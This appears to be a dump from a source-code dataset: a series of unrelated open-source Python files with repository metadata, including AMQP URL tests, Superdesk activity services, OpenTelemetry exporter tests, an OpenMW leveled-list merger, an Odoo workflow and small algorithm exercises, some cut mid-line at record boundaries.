Test('amqp://green:5678/all/good',
scheme='amqp',
host='green',
port=5678,
path='all/good'),
Test('amqp://red:2323',
scheme='amqp',
host='red',
port=2323),
Test('amqp://black',
scheme='amqp',
host='black',
port=5672),
Test('amqps://purple',
scheme='amqps',
host='purple',
port=5671),
Test('orange:6545',
scheme='amqp',
host='orange',
port=6545),
Test('localhost',
scheme='amqp',
host='localhost',
port=5672),
Test('',
scheme='amqp',
port=5672),
]
class TestURL(TestCase):
def test_parsing(self):
for test in TESTS:
test(self)
def test_canonical(self):
urls = [
'qpid+amqp://elmer:fudd@test-host:5000/all',
'amqp://elmer:fudd@test-host:5000/all',
'amqp://test-host:5000/all',
'amqp://test-host:5000'
]
for _url in urls:
url = URL(_url)
self.assertEqual(url.canonical, _url.split('+')[-1].rsplit('/all')[0])
def test_is_ssl(self):
# false
url = URL('amqp://localhost')
self.assertFalse(url.is_ssl())
# true
url = URL('amqps://localhost')
self.assertTrue(url.is_ssl())
def test_hash(self):
url = URL('test')
self.assertEqual(hash(url), hash(url.canonical))
def test_str(self):
urls = [
'qpid+amqp://elmer:fudd@test-host:5000/all',
'amqp://elmer:fudd@test-host:5000/all',
'amqp://test-host:5000/all',
'amqp://test-host:5000',
'amqp://test-host',
]
for _url in urls:
url = URL(_url)
self.assertEqual(str(url), url.canonical)
class TestScheme(TestCase):
def test_validated(self):
for n in PORT:
self.assertEqual(Scheme.validated(n), n.lower())
self.assertRaises(ValueError, Scheme.validated, 'unsupported')
|
akintolga/superdesk-core
|
superdesk/activity.py
|
Python
|
agpl-3.0
| 10,291
| 0.002624
|
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
import datetime
import logging
from bson.objectid import ObjectId
from flask import g
import superdesk
from superdesk import get_resource_service
from superdesk.emails import send_activity_emails
from superdesk.errors import SuperdeskApiError, add_notifier
from superdesk.notification import push_notification
from superdesk.resource import Resource
from superdesk.services import BaseService
from superdesk.utc import utcnow
log = logging.getLogger(__name__)
def init_app(app):
endpoint_name = 'activity'
service = ActivityService(endpoint_name, backend=superdesk.get_backend())
ActivityResource(endpoint_name, app=app, service=service)
endpoint_name = 'audit'
service = AuditService(endpoint_name, backend=superdesk.get_backend())
AuditResource(endpoint_name, app=app, service=service)
app.on_inserted += service.on_generic_inserted
app.on_updated += service.on_generic_updated
app.on_deleted_item += service.on_generic_deleted
# Registering with intrinsic privileges because: A user should be able to mark as read their own notifications.
superdesk.intrinsic_privilege(resource_name='activity', method=['PATCH'])
class AuditResource(Resource):
endpoint_name = 'audit'
resource_methods = ['GET']
item_methods = ['GET']
schema = {
'resource': {'type': 'string'},
'action': {'type': 'string'},
'extra': {'type': 'dict'},
'user': Resource.rel('users', False)
}
exclude = {endpoint_name, 'activity', 'dictionaries', 'macros'}
class AuditService(BaseService):
def on_generic_inserted(self, resource, docs):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
if not len(docs):
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'created',
'extra': docs[0]
}
self.post([audit])
def on_generic_updated(self, resource, doc, original):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'updated',
'extra': doc
}
self.post([audit])
def on_generic_deleted(self, resource, doc):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'deleted',
'extra': doc
}
self.post([audit])
class ActivityResource(Resource):
endpoint_name = 'activity'
resource_methods = ['GET']
item_methods = ['GET', 'PATCH']
schema = {
'name': {'type': 'string'},
'message': {'type': 'string'},
'data': {'type': 'dict'},
'recipients': {
'type': 'list',
'schema': {
'type': 'dict',
'schema': {
'user_id': Resource.rel('users'),
'read': {'type': 'boolean', 'default': False},
'desk_id': Resource.rel('desks')
}
}
},
'item': Resource.rel('archive', type='string'),
'user': Resource.rel('users'),
'desk': Resource.rel('desks'),
'resource': {'type': 'string'}
}
exclude = {endpoint_name, 'notification'}
datasource = {
'default_sort': [('_created', -1)]
|
,
'filter': {'_created': {'$gte': utcnow() - datetime.timedelta(days=1)}}
}
superdesk.register_default_user_preference('email:notification', {
'type': 'bool',
'enabled': True,
'default': True,
'label': 'Send notifications via email',
'category': 'notifications',
})
class ActivityService(BaseService):
|
def on_update(self, updates, original):
""" Called on the patch request to mark a activity/notification/comment as having been read and
nothing else
:param updates:
:param original:
:return:
"""
user = getattr(g, 'user', None)
if not user:
raise SuperdeskApiError.notFoundError('Can not determine user')
user_id = user.get('_id')
# make sure that the user making the read notification is in the notification list
if not self.is_recipient(updates, user_id):
raise SuperdeskApiError.forbiddenError('User is not in the notification list')
# make sure the transition is from not read to read
if not self.is_read(updates, user_id) and self.is_read(original, user_id):
raise SuperdeskApiError.forbiddenError('Can not set notification as read')
# make sure that no other users are being marked as read
for recipient in updates.get('recipients', []):
if recipient['user_id'] != user_id:
if self.is_read(updates, recipient['user_id']) != self.is_read(original, recipient['user_id']):
raise SuperdeskApiError.forbiddenError('Can not set other users notification as read')
# make sure that no other fields are being up dated just read and _updated
if len(updates) != 2:
raise SuperdeskApiError.forbiddenError('Can not update')
def is_recipient(self, activity, user_id):
"""
Checks if the given user is in the list of recipients
"""
return any(r for r in activity.get('recipients', []) if r['user_id'] == user_id)
def is_read(self, activity, user_id):
"""
Returns the read value for the given user
"""
return next((r['read'] for r in activity.get('recipients', []) if r['user_id'] == user_id), False)
ACTIVITY_CREATE = 'create'
ACTIVITY_UPDATE = 'update'
ACTIVITY_DELETE = 'delete'
ACTIVITY_EVENT = 'event'
ACTIVITY_ERROR = 'error'
def add_activity(activity_name, msg, resource=None, item=None, notify=None, notify_desks=None,
can_push_notification=True, **data):
"""
Adds an activity into activity log.
This will became part of current user activity log.
If there is someone set to be notified it will make it into his notifications box.
:param activity_name: Name of the activity
:type activity_name: str
:param msg: Message to be recorded in the activity log
:type msg: str
:param resource: resource name generating this activity
:type resource: str
:param item: article instance, if the activity is being recorded against an article, default None
:type item: dict
:param notify: user identifiers against whom the activity should be recorded, default None
:type notify: list
:param notify_desks: desk identifiers if someone mentions Desk Name in comments widget, default None
:type notify_desks: list
:param can_push_notification: flag indicating if a notification should be pushed via WebSocket, default True
:type can_push_notification: bool
:param data: kwargs
:type data: dict
:return: activity object
:rtype: dict
"""
activity = {
'name': activity_name,
'message': msg,
'data': data,
'resource': resource
}
name = ActivityResource.endpoint_name
user = getattr(g, 'user', None)
if user:
activity['user'] = user.get('_id')
activity['recipients'] = []
if notify:
activity['recipients'] = [{'user_id': ObjectId(_id), 'read': False} for _id in notify]
name = activity_name
if notify_desks:
activity['recipients'].extend([{'desk_id': ObjectId(_id), 'read': False} for _id in notify_desks])
name = activity_na
|
guillaume-philippon/aquilon
|
lib/aquilon/worker/commands/map_service.py
|
Python
|
apache-2.0
| 3,474
| 0.001727
|
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq map service`."""
from aquilon.worker.broker import BrokerCommand
from aquilon.aqdb.model import (Personality, HostEnvironment, ServiceMap,
ServiceInstance, NetworkEnvironment)
from aquilon.aqdb.model.host_environment import Production
from aquilon.worker.dbwrappers.change_management import (validate_prod_personality,
enforce_justification)
from aquilon.worker.dbwrappers.location import get_location
from aquilon.work
|
er.dbwrappers.network import get_network_byip
class CommandMapService(BrokerCommand):
required_parameters = ["service", "instance"]
def doit(self, session, dbmap, dbinstance, dblocation, dbnetwork, dbpersona,
dbenv):
if not dbmap:
dbmap = ServiceMap(service_instance=dbinstance, location=dblocation,
networ
|
k=dbnetwork, personality=dbpersona,
host_environment=dbenv)
session.add(dbmap)
def render(self, session, logger, service, instance, archetype, personality,
host_environment, networkip, justification, reason, user,
**kwargs):
dbinstance = ServiceInstance.get_unique(session, service=service,
name=instance, compel=True)
dblocation = get_location(session, **kwargs)
if networkip:
dbnet_env = NetworkEnvironment.get_unique_or_default(session)
dbnetwork = get_network_byip(session, networkip, dbnet_env)
else:
dbnetwork = None
dbpersona = None
dbenv = None
if personality:
dbpersona = Personality.get_unique(session, name=personality,
archetype=archetype, compel=True)
for dbstage in dbpersona.stages.values():
validate_prod_personality(dbstage, user, justification, reason, logger)
elif host_environment:
dbenv = HostEnvironment.get_instance(session, host_environment)
if isinstance(dbenv, Production):
enforce_justification(user, justification, reason, logger)
else:
enforce_justification(user, justification, reason, logger)
q = session.query(ServiceMap)
q = q.filter_by(service_instance=dbinstance,
location=dblocation, network=dbnetwork,
personality=dbpersona,
host_environment=dbenv)
dbmap = q.first()
self.doit(session, dbmap, dbinstance, dblocation, dbnetwork, dbpersona,
dbenv)
session.flush()
return
|
GoogleCloudPlatform/opentelemetry-operations-python
|
opentelemetry-exporter-gcp-trace/tests/test_cloud_trace_exporter.py
|
Python
|
apache-2.0
| 28,235
| 0.000106
|
# Copyright 2021 The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import unittest
from unittest import mock
import pkg_resources
from google.cloud.trace_v2.types import AttributeValue, BatchWriteSpansRequest
from google.cloud.trace_v2.types import Span as ProtoSpan
from google.cloud.trace_v2.types import TruncatableString
from google.rpc import code_pb2
from google.rpc.status_pb2 import Status
from opentelemetry.exporter.cloud_trace import (
MAX_EVENT_ATTRS,
MAX_LINK_ATTRS,
MAX_NUM_EVENTS,
MAX_NUM_LINKS,
CloudTraceSpanExporter,
_extract_attributes,
_extract_events,
_extract_links,
_extract_resources,
_extract_span_kind,
_extract_status,
_format_attribute_value,
_get_time_from_ns,
_strip_characters,
_truncate_str,
)
from opentelemetry.exporter.cloud_trace.version import __version__
from opentelemetry.sdk.resources import Resource
from opentelemetry.sdk.trace import Event
from opentelemetry.sdk.trace import _Span as Span
from opentelemetry.trace import Link, SpanContext, SpanKind
from opentelemetry.trace.status import Status as SpanStatus
from opentelemetry.trace.status import StatusCode
|
# pylint: disable=too-many-public-methods
class TestCloudTraceSpanExporter(unittest.TestCase):
def setUp(self):
self.client_patcher = mock.patch(
"opentelemetry.exporter.cloud_trace.TraceServiceClient"
)
self.client_patcher.start()
def tearDown(self):
self.client_patcher.stop()
@classmethod
def setUpClass(cls):
c
|
ls.project_id = "PROJECT"
cls.attributes_variety_pack = {
"str_key": "str_value",
"bool_key": False,
"double_key": 1.421,
"int_key": 123,
}
cls.extracted_attributes_variety_pack = ProtoSpan.Attributes(
attribute_map={
"str_key": AttributeValue(
string_value=TruncatableString(
value="str_value", truncated_byte_count=0
)
),
"bool_key": AttributeValue(bool_value=False),
"double_key": AttributeValue(
string_value=TruncatableString(
value="1.4210", truncated_byte_count=0
)
),
"int_key": AttributeValue(int_value=123),
}
)
cls.agent_code = _format_attribute_value(
"opentelemetry-python {}; google-cloud-trace-exporter {}".format(
_strip_characters(
pkg_resources.get_distribution("opentelemetry-sdk").version
),
_strip_characters(__version__),
)
)
cls.example_trace_id = "6e0c63257de34c92bf9efcd03927272e"
cls.example_span_id = "95bb5edabd45950f"
cls.example_time_in_ns = 1589919268850900051
cls.example_time_stamp = _get_time_from_ns(cls.example_time_in_ns)
cls.str_20kb = "a" * 20 * 1024
cls.str_16kb = "a" * 16 * 1024
cls.str_300 = "a" * 300
cls.str_256 = "a" * 256
cls.str_128 = "a" * 128
def test_constructor_default(self):
exporter = CloudTraceSpanExporter(self.project_id)
self.assertEqual(exporter.project_id, self.project_id)
def test_constructor_explicit(self):
client = mock.Mock()
exporter = CloudTraceSpanExporter(self.project_id, client=client)
self.assertIs(exporter.client, client)
self.assertEqual(exporter.project_id, self.project_id)
def test_export(self):
resource_info = Resource(
{
"cloud.account.id": 123,
"host.id": "host",
"cloud.zone": "US",
"cloud.provider": "gcp",
"gcp.resource_type": "gce_instance",
}
)
span_datas = [
Span(
name="span_name",
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(self.example_span_id, 16),
is_remote=False,
),
parent=None,
kind=SpanKind.INTERNAL,
resource=resource_info,
attributes={"attr_key": "attr_value"},
)
]
cloud_trace_spans = {
"name": "projects/{}/traces/{}/spans/{}".format(
self.project_id, self.example_trace_id, self.example_span_id
),
"span_id": self.example_span_id,
"parent_span_id": None,
"display_name": TruncatableString(
value="span_name", truncated_byte_count=0
),
"attributes": ProtoSpan.Attributes(
attribute_map={
"g.co/r/gce_instance/zone": _format_attribute_value("US"),
"g.co/r/gce_instance/instance_id": _format_attribute_value(
"host"
),
"g.co/r/gce_instance/project_id": _format_attribute_value(
"123"
),
"g.co/agent": self.agent_code,
"attr_key": _format_attribute_value("attr_value"),
}
),
"links": None,
"status": None,
"time_events": None,
"start_time": None,
"end_time": None,
# pylint: disable=no-member
"span_kind": ProtoSpan.SpanKind.INTERNAL,
}
client = mock.Mock()
exporter = CloudTraceSpanExporter(self.project_id, client=client)
exporter.export(span_datas)
self.assertTrue(client.batch_write_spans.called)
client.batch_write_spans.assert_called_with(
request=BatchWriteSpansRequest(
name="projects/{}".format(self.project_id),
spans=[cloud_trace_spans],
)
)
def test_extract_status_code_unset(self):
self.assertIsNone(
_extract_status(SpanStatus(status_code=StatusCode.UNSET))
)
def test_extract_status_code_ok(self):
self.assertEqual(
_extract_status(SpanStatus(status_code=StatusCode.OK)),
Status(code=code_pb2.OK),
)
def test_extract_status_code_error(self):
self.assertEqual(
_extract_status(
SpanStatus(
status_code=StatusCode.ERROR,
description="error_desc",
)
),
Status(code=code_pb2.UNKNOWN, message="error_desc"),
)
def test_extract_status_code_future_added(self):
self.assertEqual(
_extract_status(
SpanStatus(
status_code=mock.Mock(),
)
),
Status(code=code_pb2.UNKNOWN),
)
def test_extract_empty_attributes(self):
self.assertEqual(
_extract_attributes({}, num_attrs_limit=4),
ProtoSpan.Attributes(attribute_map={}),
)
def test_extract_variety_of_attributes(self):
self.assertEqual(
_extract_attributes(
self.attributes_variety_pack, num_attrs_limit=4
),
self.extracted_attributes_variety_pack,
)
def test_extract_label_mapping_attributes(self):
attributes_labels_mapping = {
"http.scheme": "http",
"http.host": "172.19.0.4:8000",
"http.method": "POST",
"http.request_content_length": 321,
"h
|
jmelesky/omwllf
|
omwllf.py
|
Python
|
isc
| 17,912
| 0.00709
|
#!/usr/bin/env python3
from struct import pack, unpack
from datetime import date
from pathlib import Path
import os.path
import argparse
import sys
import re
configFilename = 'openmw.cfg'
configPaths = { 'linux': '~/.config/openmw',
'freebsd': '~/.config/openmw',
'darwin': '~/Library/Preferences/openmw' }
modPaths = { 'linux': '~/.local/share/openmw/data',
'freebsd': '~/.local/share/openmw/data',
'darwin': '~/Library/Application Support/openmw/data' }
def packLong(i):
# little-endian, "standard" 4-bytes (old 32-bit systems)
return pack('<l', i)
def packString(s):
return bytes(s, 'ascii')
def packPaddedString(s, l):
bs = bytes(s, 'ascii')
if len(bs) > l:
# still need to null-terminate
return bs[:(l-1)] + bytes(1)
else:
return bs + bytes(l - len(bs))
def parseString(ba):
i = ba.find(0)
return ba[:i].decode(encoding='ascii', errors='ignore')
def parseNum(ba):
return int.from_bytes(ba, 'little')
def parseFloat(ba):
return unpack('f', ba)[0]
def parseLEV(rec):
levrec = {}
sr = rec['subrecords']
levrec['type'] = rec['type']
levrec['name'] = parseString(sr[0]['data'])
levrec['calcfrom'] = parseNum(sr[1]['data'])
levrec['chancenone'] = parseNum(sr[2]['data'])
levrec['file'] = os.path.basename(rec['fullpath'])
# Apparently, you can have LEV records that end before
# the INDX subrecord. Found those in Tamriel_Data.esm
if len(sr) > 3:
listcount = parseNum(sr[3]['data'])
listitems = []
for i in range(0,listcount*2,2):
itemid = parseString(sr[4+i]['data'])
itemlvl = parseNum(sr[5+i]['data'])
listitems.append((itemlvl, itemid))
levrec['items'] = listitems
else:
levrec['items'] = []
return levrec
def parseTES3(rec):
tesrec = {}
sr = rec['subrecords']
tesrec['version'] = parseFloat(sr[0]['data'][0:4])
tesrec['filetype'] = parseNum(sr[0]['data'][4:8])
tesrec['author'] = parseString(sr[0]['data'][8:40])
tesrec['desc'] = parseString(sr[0]['data'][40:296])
tesrec['numrecords'] = parseNum(sr[0]['data'][296:300])
masters = []
for i in range(1, len(sr), 2):
mastfile = parseString(sr[i]['data'])
mastsize = parseNum(sr[i+1]['data'])
masters.append((mastfile, mastsize))
tesrec['masters'] = masters
return tesrec
def pullSubs(rec, subtype):
return [ s for s in rec['subrecords'] if s['type'] == subtype ]
def readHeader(ba):
header = {}
header['type'] = ba[0:4].decode()
header['length'] = int.from_bytes(ba[4:8], 'little')
return header
def readSubRecord(ba):
sr = {}
sr['type'] = ba[0:4].decode()
sr['length'] = int.from_bytes(ba[4:8], 'little')
endbyte = 8 + sr['length']
sr['data'] = ba[8:endbyte]
return (sr, ba[endbyte:])
def readRecords(filename):
fh = open(filename, 'rb')
while True:
headerba = fh.read(16)
if headerba is None or len(headerba) < 16:
return None
record = {}
header = readHeader(headerba)
record['type'] = header['type']
record['length'] = header['length']
record['subrecords'] = []
# stash the filename here (a bit hacky, but useful)
record['fullpath'] = filename
remains = fh.read(header['length'])
while len(remains) > 0:
(subrecord, restofbytes) = readSubRecord(remains)
record['subrecords'].append(subrecord)
remains = restofbytes
yield record
def
|
oldGetRecords(filename, rectype):
return ( r for r in readRecords(filename) if r['type'] == rectype )
def getRecords(filename, rectypes):
numtypes = len(rectypes)
retval = [ [] for x in range(numtypes) ]
for r in readRecords(filename):
if r['type'] in rectypes:
|
for i in range(numtypes):
if r['type'] == rectypes[i]:
retval[i].append(r)
return retval
def packStringSubRecord(lbl, strval):
str_bs = packString(strval) + bytes(1)
l = packLong(len(str_bs))
return packString(lbl) + l + str_bs
def packIntSubRecord(lbl, num, numsize=4):
# This is interesting. The 'pack' function from struct works fine like this:
#
# >>> pack('<l', 200)
# b'\xc8\x00\x00\x00'
#
# but breaks if you make that format string a non-literal:
#
# >>> fs = '<l'
# >>> pack(fs, 200)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# struct.error: repeat count given without format specifier
#
# This is as of Python 3.5.2
num_bs = b''
if numsize == 4:
# "standard" 4-byte longs, little-endian
num_bs = pack('<l', num)
elif numsize == 2:
num_bs = pack('<h', num)
elif numsize == 1:
# don't think endian-ness matters for bytes, but consistency
num_bs = pack('<b', num)
elif numsize == 8:
num_bs = pack('<q', num)
return packString(lbl) + packLong(numsize) + num_bs
def packLEV(rec):
start_bs = b''
id_bs = b''
if rec['type'] == 'LEVC':
start_bs += b'LEVC'
id_bs = 'CNAM'
else:
start_bs += b'LEVI'
id_bs = 'INAM'
headerflags_bs = bytes(8)
name_bs = packStringSubRecord('NAME', rec['name'])
calcfrom_bs = packIntSubRecord('DATA', rec['calcfrom'])
chance_bs = packIntSubRecord('NNAM', rec['chancenone'], 1)
subrec_bs = packIntSubRecord('INDX', len(rec['items']))
for (lvl, lid) in rec['items']:
subrec_bs += packStringSubRecord(id_bs, lid)
subrec_bs += packIntSubRecord('INTV', lvl, 2)
reclen = len(name_bs) + len(calcfrom_bs) + len(chance_bs) + len(subrec_bs)
reclen_bs = packLong(reclen)
return start_bs + reclen_bs + headerflags_bs + \
name_bs + calcfrom_bs + chance_bs + subrec_bs
def packTES3(desc, numrecs, masters):
start_bs = b'TES3'
headerflags_bs = bytes(8)
hedr_bs = b'HEDR' + packLong(300)
version_bs = pack('<f', 1.0)
# .esp == 0, .esm == 1, .ess == 32
# suprisingly, .omwaddon == 0, also -- figured it would have its own
ftype_bs = bytes(4)
author_bs = packPaddedString('omwllf, copyright 2017, jmelesky', 32)
desc_bs = packPaddedString(desc, 256)
numrecs_bs = packLong(numrecs)
masters_bs = b''
for (m, s) in masters:
masters_bs += packStringSubRecord('MAST', m)
masters_bs += packIntSubRecord('DATA', s, 8)
reclen = len(hedr_bs) + len(version_bs) + len(ftype_bs) + len(author_bs) +\
len(desc_bs) + len(numrecs_bs) + len(masters_bs)
reclen_bs = packLong(reclen)
return start_bs + reclen_bs + headerflags_bs + \
hedr_bs + version_bs + ftype_bs + author_bs + \
desc_bs + numrecs_bs + masters_bs
def ppSubRecord(sr):
if sr['type'] in ['NAME', 'INAM', 'CNAM']:
print(" %s, length %d, value '%s'" % (sr['type'], sr['length'], parseString(sr['data'])))
elif sr['type'] in ['DATA', 'NNAM', 'INDX', 'INTV']:
print(" %s, length %d, value '%s'" % (sr['type'], sr['length'], parseNum(sr['data'])))
else:
print(" %s, length %d" % (sr['type'], sr['length']))
def ppRecord(rec):
print("%s, length %d" % (rec['type'], rec['length']))
for sr in rec['subrecords']:
ppSubRecord(sr)
def ppLEV(rec):
if rec['type'] == 'LEVC':
print("Creature list '%s' from '%s':" % (rec['name'], rec['file']))
else:
print("Item list '%s' from '%s':" % (rec['name'], rec['file']))
print("flags: %d, chance of none: %d" % (rec['calcfrom'], rec['chancenone']))
for (lvl, lid) in rec['items']:
print(" %2d - %s" % (lvl, lid))
def ppTES3(rec):
print("TES3 record, type %d, version %f" % (rec['filetype'], rec['version']))
print("author: %s" % rec['author'])
print("description: %s" % rec['desc'])
for (mfile, msize) in rec['masters']:
print(" master %s, size %d" % (mfile, msize))
print()
def mergeableLists(alllists):
candidates = {}
for l in alllists:
lid = l['name
|
pavithranrao/projectEuler
|
projectEulerPython/problem001.py
|
Python
|
mit
| 429
| 0
|
#!/bin/python
import sys
def getSumOfAP(n, m
|
ax):
size = (max - 1) // n
return (size * (n + size * (n)) / 2)
def getSumOfMultiples(n):
return (getSumOfAP(3, n) + getSumOfAP(5, n) - getSumOfAP(15, n))
def main():
numInputs = int(raw_input().strip())
for idx in xrange(numInputs):
n = in
|
t(raw_input().strip())
ans = getSumOfAP(n)
print(ans)
if __name__ == '__main__':
main()
|
schlueter/ansible-lint
|
lib/ansiblelint/rules/MismatchedBracketRule.py
|
Python
|
mit
| 1,497
| 0
|
# Copyright (c) 2013-2014 Will Thames <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
|
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# L
|
IABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint import AnsibleLintRule
class MismatchedBracketRule(AnsibleLintRule):
id = 'ANSIBLE0003'
shortdesc = 'Mismatched { and }'
description = 'If lines contain more { than } or vice ' + \
'versa then templating can fail nastily'
tags = ['templating']
def match(self, file, line):
return line.count("{") != line.count("}")
|
odoousers2014/odoo_addons-2
|
clv_tray/wkf/clv_tray_wkf.py
|
Python
|
agpl-3.0
| 3,291
| 0.009116
|
# -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from openerp import models, fields, api
from datetime import *
import time
class clv_tray(models.Model):
_inherit = 'clv_tray'
date = fields.Datetime("Status change date"
|
, required=True, readonly=True,
default=lambda *a: datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
date_activation = fields.Datetime("Activation date", required=False, readonly=False)
dat
|
e_inactivation = fields.Datetime("Inactivation date", required=False, readonly=False)
date_suspension = fields.Datetime("Suspension date", required=False, readonly=False)
state = fields.Selection([('new','New'),
('active','Active'),
('inactive','Inactive'),
('suspended','Suspended')
], string='Status', default='new', readonly=True, required=True, help="")
@api.one
def button_new(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
self.state = 'new'
@api.one
def button_activate(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_activation:
self.date_activation = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'active'
@api.one
def button_inactivate(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_inactivation:
self.date_inactivation = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'inactive'
@api.one
def button_suspend(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_suspension:
self.date_suspension = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'suspended'
|
Jumpscale/ays_jumpscale8
|
tests/test_services/test_validate_delete_models/actions.py
|
Python
|
apache-2.0
| 2,695
| 0.005937
|
def init_actions_(service, args):
"""
this needs to returns an array of actions representing the depencies between actions.
Looks at ACTION_DEPS in this module for an example of what is expected
""
|
"
# some default logic for simple actions
return {
'test': ['install']
}
def test(job):
"""
|
Tests parsing of a bp with/without default values
"""
import sys
RESULT_OK = 'OK : %s'
RESULT_FAILED = 'FAILED : %s'
RESULT_ERROR = 'ERROR : %s %%s' % job.service.name
model = job.service.model
model.data.result = RESULT_OK % job.service.name
test_repo_path = j.sal.fs.joinPaths(j.dirs.varDir, 'tmp', 'test_validate_model')
sample_bp_path = j.sal.fs.joinPaths('/opt/code/github/jumpscale/jumpscale_core8/tests/samples/test_validate_delete_model_sample.yaml')
try:
if j.sal.fs.exists(test_repo_path):
j.sal.fs.removeDirTree(test_repo_path)
test_repo = j.atyourservice.repoCreate(test_repo_path, '[email protected]:0-complexity/ays_automatic_cockpit_based_testing.git')
bp_path = j.sal.fs.joinPaths(test_repo.path, 'blueprints', 'test_validate_delete_model_sample.yaml')
j.sal.fs.copyFile(j.sal.fs.joinPaths(sample_bp_path), j.sal.fs.joinPaths(test_repo.path, 'blueprints'))
test_repo.blueprintExecute(bp_path)
action = 'install'
role = 'sshkey'
instance = 'main'
for service in test_repo.servicesFind(actor="%s.*" % role, name=instance):
service.scheduleAction(action=action, period=None, log=True, force=False)
run = test_repo.runCreate(profile=False, debug=False)
run.execute()
test_repo.destroy()
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "actors")):
model.data.result = RESULT_FAILED % ('Actors directory is not deleted')
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "services")):
model.data.result = RESULT_FAILED % ('Services directory is not deleted')
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "recipes")):
model.data.result = RESULT_FAILED % ('Recipes directory is not deleted')
if test_repo.actors:
model.data.result = RESULT_FAILED % ('Actors model is not removed')
if test_repo.services:
model.data.result = RESULT_FAILED % ('Services model is not removed')
if not j.core.jobcontroller.db.runs.find(repo=test_repo.model.key):
model.data.result = RESULT_FAILED % ('Jobs are deleted after repository destroy')
except:
model.data.result = RESULT_ERROR % str(sys.exc_info()[:2])
finally:
job.service.save()
|
codecakes/algorithms
|
algorithms/code30DaysImp/helper/quicksort.py
|
Python
|
mit
| 1,313
| 0.006855
|
#!/bin/python
def swap(findex, sindex, ar):
ar[findex], ar[sindex] = ar[sindex], ar[findex]
def partition(ar, lo, hi):
'''3 way djisktra partition method'''
start = lo
pivotIndex = (lo+hi)//2
# take the elemet @ hi as the
|
pivot and swap it to pivotIndex position
swap(pivotIndex, hi, ar)
pivotIndex = hi
pivot = ar[pivotIndex]
eq = lo
for index in xrange(lo, hi):
if (ar[eq] == pivot):
eq += 1
if (ar[index] < pivot and index < pivotIndex):
swap(index, lo, ar)
lo += 1
eq +=1
swap(lo, pivotIndex, ar)
return lo
def quickSort(
|
ar):
'''Iterative unstable in-place sort'''
n = len(ar)
hi = n-1
lo = 0
stack = [(lo, hi)]
while stack:
lo, hi = stack.pop()
pivot = partition(ar, lo, hi)
if lo<pivot-1:
stack.insert(0, (lo, pivot-1))
if pivot+1<hi:
stack.insert(0, (pivot+1, hi))
def quickSortRec(ar, n, lo, hi):
'''Recursive unstable in-place sort'''
pivot = partition(ar, lo, hi)
# print lo, pivot, hi
